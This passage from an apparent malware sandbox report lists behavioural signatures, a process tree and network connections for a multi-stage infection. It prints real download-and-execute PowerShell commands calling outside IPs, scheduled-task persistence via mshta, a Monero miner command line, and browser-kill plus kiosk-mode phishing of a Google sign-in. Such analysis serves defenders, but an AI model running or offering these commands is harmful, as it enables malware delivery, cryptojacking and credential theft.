| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\System32\notepad.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\System32\notepad.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe
"C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe"
C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe
"C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
"C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6C1.tmp\6C2.tmp\6C3.bat C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
"C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe
"C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe"
C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
"C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"
C:\Users\Admin\AppData\Local\Temp\10107440101\840fb92a2b.exe
"C:\Users\Admin\AppData\Local\Temp\10107440101\840fb92a2b.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn I76AamawRik /tr "mshta C:\Users\Admin\AppData\Local\Temp\kxJOvNhGM.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\kxJOvNhGM.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn I76AamawRik /tr "mshta C:\Users\Admin\AppData\Local\Temp\kxJOvNhGM.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10107450121\am_no.cmd" "
C:\Windows\SysWOW64\timeout.exe
timeout /t 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5wlhjbmh\5wlhjbmh.cmdline"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4FE0.tmp" "c:\Users\Admin\AppData\Local\Temp\5wlhjbmh\CSCA8772FE477F3431A8E4EB01FFA7070FE.TMP"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Users\Admin\AppData\Local\TempZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE
"C:\Users\Admin\AppData\Local\TempZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "1bVtkmaEFba" /tr "mshta \"C:\Temp\4buU3vPam.hta\"" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta "C:\Temp\4buU3vPam.hta"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
C:\Users\Admin\AppData\Local\Temp\10107670101\ffd8234368.exe
"C:\Users\Admin\AppData\Local\Temp\10107670101\ffd8234368.exe"
C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe
"C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe"
C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe
"C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe"
C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe
"C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4784 -ip 4784
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4784 -s 820
C:\Windows\System32\notepad.exe
--donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 4912"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\ProgramData\rjbum\abfjdu.exe
C:\ProgramData\rjbum\abfjdu.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\10107690101\8e014fc6f7.exe
"C:\Users\Admin\AppData\Local\Temp\10107690101\8e014fc6f7.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 4912"
C:\Users\Admin\AppData\Local\Temp\10107700101\82ce3de40e.exe
"C:\Users\Admin\AppData\Local\Temp\10107700101\82ce3de40e.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\10107710101\250c1f6b4d.exe
"C:\Users\Admin\AppData\Local\Temp\10107710101\250c1f6b4d.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 4912"
C:\Users\Admin\AppData\Local\Temp\10107720101\860be6c356.exe
"C:\Users\Admin\AppData\Local\Temp\10107720101\860be6c356.exe"
C:\Users\Admin\AppData\Local\Temp\SQMULMKG7P2NOJYV25CC06RC2V3IFM3.exe
"C:\Users\Admin\AppData\Local\Temp\SQMULMKG7P2NOJYV25CC06RC2V3IFM3.exe"
C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe
"C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM firefox.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM chrome.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM msedge.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM opera.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM brave.exe /T
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2016 -parentBuildID 20240401114208 -prefsHandle 1936 -prefMapHandle 1916 -prefsLen 27356 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b3219f9b-7f74-406f-9bf8-d68635766d42} 3872 "\\.\pipe\gecko-crash-server-pipe.3872" gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2480 -parentBuildID 20240401114208 -prefsHandle 2456 -prefMapHandle 2452 -prefsLen 28276 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {01c09d46-e774-4e15-ae93-1616266d2440} 3872 "\\.\pipe\gecko-crash-server-pipe.3872" socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3184 -childID 1 -isForBrowser -prefsHandle 1436 -prefMapHandle 2628 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 1068 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d4f67990-34d8-4010-9f43-2286c1a1ceb5} 3872 "\\.\pipe\gecko-crash-server-pipe.3872" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4120 -childID 2 -isForBrowser -prefsHandle 4112 -prefMapHandle 4108 -prefsLen 32766 -prefMapSize 244628 -jsInitHandle 1068 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d3dc32dc-7c8f-4fd4-a5d9-9af212b745cc} 3872 "\\.\pipe\gecko-crash-server-pipe.3872" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4880 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4872 -prefMapHandle 4868 -prefsLen 32854 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {aa3abcb1-6eae-4a53-95b8-d1042466a2de} 3872 "\\.\pipe\gecko-crash-server-pipe.3872" utility
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5212 -childID 3 -isForBrowser -prefsHandle 4696 -prefMapHandle 5180 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1068 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7c5ed142-abae-401c-8b7c-ee583ef0bbd4} 3872 "\\.\pipe\gecko-crash-server-pipe.3872" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5440 -childID 4 -isForBrowser -prefsHandle 5360 -prefMapHandle 5368 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1068 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {653f8cec-3367-4821-af54-fec38fe8fcf9} 3872 "\\.\pipe\gecko-crash-server-pipe.3872" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5548 -childID 5 -isForBrowser -prefsHandle 5628 -prefMapHandle 5624 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1068 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b22b891f-18d5-4a40-acaf-52150da83d07} 3872 "\\.\pipe\gecko-crash-server-pipe.3872" tab
C:\Users\Admin\AppData\Local\Temp\10107740101\91ff33b7b2.exe
"C:\Users\Admin\AppData\Local\Temp\10107740101\91ff33b7b2.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 4912"
C:\Users\Admin\AppData\Local\Temp\10107750101\zY9sqWs.exe
"C:\Users\Admin\AppData\Local\Temp\10107750101\zY9sqWs.exe"
C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe
"C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\92EF.tmp\92F0.tmp\92F1.bat C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 4912"
C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe
"C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jwm4ybui\jwm4ybui.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBD5B.tmp" "c:\Users\Admin\AppData\Local\Temp\jwm4ybui\CSCD9F6A0106DC94F429C6CF68E69297485.TMP"
C:\Windows\explorer.exe
explorer.exe
C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe"
C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4300 -ip 4300
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4300 -s 800
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe
"C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe"
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe"
C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 6740 -ip 6740
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6740 -s 772
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | circujitstorm.bet | udp |
| US | 8.8.8.8:53 | explorebieology.run | udp |
| US | 8.8.8.8:53 | gadgethgfub.icu | udp |
| US | 8.8.8.8:53 | moderzysics.top | udp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| RU | 176.113.115.6:80 | 176.113.115.6 | tcp |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| NL | 45.144.212.77:16000 | 45.144.212.77 | tcp |
| US | 8.8.8.8:53 | cobolrationumelawrtewarms.com | udp |
| NL | 107.189.27.66:80 | cobolrationumelawrtewarms.com | tcp |
| LU | 45.59.120.8:80 | 45.59.120.8 | tcp |
| NL | 45.154.98.175:6969 | tcp | |
| RU | 176.113.115.7:80 | 176.113.115.7 | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
